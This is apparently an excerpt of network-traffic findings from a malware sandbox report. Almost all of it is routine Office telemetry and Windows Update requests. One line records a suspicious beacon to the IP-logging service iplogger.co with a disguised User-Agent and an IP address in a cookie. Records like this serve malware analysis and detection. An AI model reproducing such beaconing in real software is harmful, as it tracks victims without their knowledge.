Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=OuAA4CfBYWXbLdl&MD=SSg1k1Wh HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /155qJ4.torrent HTTP/1.1Referer: ENDUser-Agent: 391467B9-BD4E-2B74-71A6-03A3DA3DE322Host: iplogger.coCache-Control: no-cacheCookie: 55593078137264100=3; clhf03028ja=8.46.123.228
Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
